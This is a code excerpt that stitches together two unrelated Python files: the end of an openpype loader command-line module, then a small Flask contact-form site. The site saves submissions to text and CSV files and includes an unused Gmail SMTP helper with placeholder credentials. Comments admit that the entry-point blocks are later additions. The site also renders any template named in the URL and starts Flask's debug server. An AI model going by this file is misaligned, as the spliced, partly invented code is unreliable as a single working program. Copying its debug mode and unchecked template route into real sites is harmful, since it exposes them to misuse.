        _config.install()
    else:
        print("Config `%s` has no function `install`" % _config.__name__)

    show()
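

# NOTE: Hedged addition, not part of the original module. The file defines
# `cli(args)` but has no entry point guard, so this is a minimal sketch of
# how it could be launched directly from a shell, assuming the package is
# importable and that `cli()` expects the argument list without the program
# name (which matches `argparse.parse_args(args)` above):
#
#     python -m openpype.tools.loader <project>
#
if __name__ == "__main__":
    cli(sys.argv[1:])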
the-stack_106_24425
from flask import Flask, render_template, url_for, request, redirect
import smtplib
import csv

app = Flask(__name__)


def write_to_db(data):
    # Append the submitted form data as a comma separated line to a text file
    with open('database.txt', mode='a') as db:
        email = data['email']
        name = data['name']
        subject = data['subject']
        message = data['message']
        db.write(f'\n{email},{name},{subject},{message}')


def write_to_csv(data):
    # Append the submitted form data as a properly quoted CSV row
    with open('database.csv', mode='a', newline='') as csv_db:
        email = data['email']
        name = data['name']
        subject = data['subject']
        message = data['message']
        csv_writer = csv.writer(csv_db, delimiter=',', quotechar='"',
                                quoting=csv.QUOTE_MINIMAL)
        csv_writer.writerow([email, name, subject, message])


def send_mail(i_sender_name, i_sender_email, i_subject, i_message):
    # Forward the contact form contents through Gmail's SMTP server.
    # Replace the placeholder credentials and recipient before using it.
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    website_email_address = 'Website email'
    server.login(website_email_address, "Website email password")
    formatted_message = (
        f'From: {i_sender_email}, {i_sender_name}\n'
        f'Subject: {i_subject}\n'
        f'Message: {i_message}'
    )
    server.sendmail(website_email_address, 'Personal email', formatted_message)


@app.route('/', methods=['POST', 'GET'])
def hello_world():
    return render_template('index.html')


@app.route('/<string:page_name>')
def html_page(page_name):
    return render_template(page_name + '.html')


@app.route('/submit_form', methods=['POST', 'GET'])
def submit_form():
    if request.method == 'POST':
        try:
            write_to_csv(request.form.to_dict())
            # write_to_db(request.form.to_dict())
            # Uncomment and edit send_mail() so the website emails you when
            # people try to contact you:
            # send_mail(name, email, subject, message)
            return redirect('/thankyou')
        except Exception:
            return 'data was not saved in database'
    else:
        return '<Error: not a post request>'
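

# NOTE: Hedged addition, not in the original file. The routes above are
# defined but the module never starts the server itself (presumably it is
# launched with `flask run`). A minimal sketch for local development,
# assuming the file is run directly; in production a WSGI server such as
# gunicorn would be used instead of the built-in development server:
if __name__ == "__main__":
    app.run(debug=True)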